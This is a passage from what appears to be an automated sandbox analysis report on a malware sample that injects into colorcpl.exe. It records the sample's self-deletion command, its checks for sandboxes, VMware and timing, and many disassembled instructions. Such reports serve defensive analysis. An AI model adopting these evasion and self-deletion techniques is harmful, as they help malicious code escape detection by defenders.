            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F3D0D1 push ecx; ret 15_2_04F3D0E4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE8846 pushad ; retf 15_2_00CE8847
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CEB85C push eax; ret 15_2_00CEB862
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE5184 pushfd ; iretd 15_2_00CE51A3
            Source: initial sampleStatic PE information: section name: .text entropy: 7.30848087754

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'Jump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.686799799.0000000002604000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 3cGH9Bakuq.exe PID: 6452, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000CD8604 second address: 0000000000CD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000CD898E second address: 0000000000CD8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exe TID: 6960Thread sleep time: -30795s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exe TID: 5224Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 2092Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2820Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004088C0 rdtsc 6_2_004088C0
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread delayed: delay time: 30795Jump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000007.00000000.690599352.0000000004710000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.714021097.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.732277196.000000000A897000.00000004.00000001.sdmpBinary or memory string: 806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.726137723.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.714021097.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.761358356.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000007.00000000.700488613.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000007.00000000.730817576.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004088C0 rdtsc 6_2_004088C0
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA14FB mov eax, dword ptr fs:[00000030h]15_2_04FA14FB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE58EC mov eax, dword ptr fs:[00000030h]15_2_04EE58EC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66CF0 mov eax, dword ptr fs:[00000030h]15_2_04F66CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66CF0 mov eax, dword ptr fs:[00000030h]15_2_04F66CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66CF0 mov eax, dword ptr fs:[00000030h]15_2_04F66CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]15_2_04F7B8D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov ecx, dword ptr fs:[00000030h]15_2_04F7B8D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]15_2_04F7B8D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]15_2_04F7B8D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]15_2_04F7B8D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7B8D0 mov eax, dword ptr fs:[00000030h]15_2_04F7B8D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB8CD6 mov eax, dword ptr fs:[00000030h]15_2_04FB8CD6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1F0BF mov ecx, dword ptr fs:[00000030h]15_2_04F1F0BF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1F0BF mov eax, dword ptr fs:[00000030h]15_2_04F1F0BF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1F0BF mov eax, dword ptr fs:[00000030h]15_2_04F1F0BF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0 mov eax, dword ptr fs:[00000030h]15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F290AF mov eax, dword ptr fs:[00000030h]15_2_04F290AF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE9080 mov eax, dword ptr fs:[00000030h]15_2_04EE9080
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F63884 mov eax, dword ptr fs:[00000030h]15_2_04F63884
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F63884 mov eax, dword ptr fs:[00000030h]15_2_04F63884
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF849B mov eax, dword ptr fs:[00000030h]15_2_04EF849B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA2073 mov eax, dword ptr fs:[00000030h]15_2_04FA2073
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB1074 mov eax, dword ptr fs:[00000030h]15_2_04FB1074
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0746D mov eax, dword ptr fs:[00000030h]15_2_04F0746D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F00050 mov eax, dword ptr fs:[00000030h]15_2_04F00050
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F00050 mov eax, dword ptr fs:[00000030h]15_2_04F00050
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7C450 mov eax, dword ptr fs:[00000030h]15_2_04F7C450
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F7C450 mov eax, dword ptr fs:[00000030h]15_2_04F7C450
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A44B mov eax, dword ptr fs:[00000030h]15_2_04F1A44B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]15_2_04EFB02A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]15_2_04EFB02A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]15_2_04EFB02A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB02A mov eax, dword ptr fs:[00000030h]15_2_04EFB02A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]15_2_04F1002D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]15_2_04F1002D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]15_2_04F1002D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]15_2_04F1002D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1002D mov eax, dword ptr fs:[00000030h]15_2_04F1002D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1BC2C mov eax, dword ptr fs:[00000030h]15_2_04F1BC2C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67016 mov eax, dword ptr fs:[00000030h]15_2_04F67016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67016 mov eax, dword ptr fs:[00000030h]15_2_04F67016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F67016 mov eax, dword ptr fs:[00000030h]15_2_04F67016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB4015 mov eax, dword ptr fs:[00000030h]15_2_04FB4015
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB4015 mov eax, dword ptr fs:[00000030h]15_2_04FB4015
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB740D mov eax, dword ptr fs:[00000030h]15_2_04FB740D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB740D mov eax, dword ptr fs:[00000030h]15_2_04FB740D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB740D mov eax, dword ptr fs:[00000030h]15_2_04FB740D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1C06 mov eax, dword ptr fs:[00000030h]15_2_04FA1C06
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]15_2_04F66C0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]15_2_04F66C0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]15_2_04F66C0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66C0A mov eax, dword ptr fs:[00000030h]15_2_04F66C0A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F98DF1 mov eax, dword ptr fs:[00000030h]15_2_04F98DF1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB1E1 mov eax, dword ptr fs:[00000030h]15_2_04EEB1E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB1E1 mov eax, dword ptr fs:[00000030h]15_2_04EEB1E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB1E1 mov eax, dword ptr fs:[00000030h]15_2_04EEB1E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFD5E0 mov eax, dword ptr fs:[00000030h]15_2_04EFD5E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFD5E0 mov eax, dword ptr fs:[00000030h]15_2_04EFD5E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F741E8 mov eax, dword ptr fs:[00000030h]15_2_04F741E8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]15_2_04F66DC9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]15_2_04F66DC9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]15_2_04F66DC9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov ecx, dword ptr fs:[00000030h]15_2_04F66DC9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]15_2_04F66DC9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F66DC9 mov eax, dword ptr fs:[00000030h]15_2_04F66DC9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F11DB5 mov eax, dword ptr fs:[00000030h]15_2_04F11DB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F11DB5 mov eax, dword ptr fs:[00000030h]15_2_04F11DB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F11DB5 mov eax, dword ptr fs:[00000030h]15_2_04F11DB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]15_2_04F651BE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]15_2_04F651BE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]15_2_04F651BE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F651BE mov eax, dword ptr fs:[00000030h]15_2_04F651BE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F135A1 mov eax, dword ptr fs:[00000030h]15_2_04F135A1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F669A6 mov eax, dword ptr fs:[00000030h]15_2_04F669A6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F161A0 mov eax, dword ptr fs:[00000030h]15_2_04F161A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F161A0 mov eax, dword ptr fs:[00000030h]15_2_04F161A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12990 mov eax, dword ptr fs:[00000030h]15_2_04F12990
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]15_2_04EE2D8A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]15_2_04EE2D8A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]15_2_04EE2D8A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]15_2_04EE2D8A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE2D8A mov eax, dword ptr fs:[00000030h]15_2_04EE2D8A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1FD9B mov eax, dword ptr fs:[00000030h]15_2_04F1FD9B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1FD9B mov eax, dword ptr fs:[00000030h]15_2_04F1FD9B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]15_2_04F12581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]15_2_04F12581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]15_2_04F12581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581 mov eax, dword ptr fs:[00000030h]15_2_04F12581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0C182 mov eax, dword ptr fs:[00000030h]15_2_04F0C182
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1A185 mov eax, dword ptr fs:[00000030h]15_2_04F1A185
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0C577 mov eax, dword ptr fs:[00000030h]15_2_04F0C577
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0C577 mov eax, dword ptr fs:[00000030h]15_2_04F0C577
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEC962 mov eax, dword ptr fs:[00000030h]15_2_04EEC962
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB171 mov eax, dword ptr fs:[00000030h]15_2_04EEB171
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEB171 mov eax, dword ptr fs:[00000030h]15_2_04EEB171
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F07D50 mov eax, dword ptr fs:[00000030h]15_2_04F07D50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F23D43 mov eax, dword ptr fs:[00000030h]15_2_04F23D43
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0B944 mov eax, dword ptr fs:[00000030h]15_2_04F0B944
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F0B944 mov eax, dword ptr fs:[00000030h]15_2_04F0B944
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F63540 mov eax, dword ptr fs:[00000030h]15_2_04F63540
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F6A537 mov eax, dword ptr fs:[00000030h]15_2_04F6A537
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14D3B mov eax, dword ptr fs:[00000030h]15_2_04F14D3B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14D3B mov eax, dword ptr fs:[00000030h]15_2_04F14D3B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F14D3B mov eax, dword ptr fs:[00000030h]15_2_04F14D3B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1513A mov eax, dword ptr fs:[00000030h]15_2_04F1513A
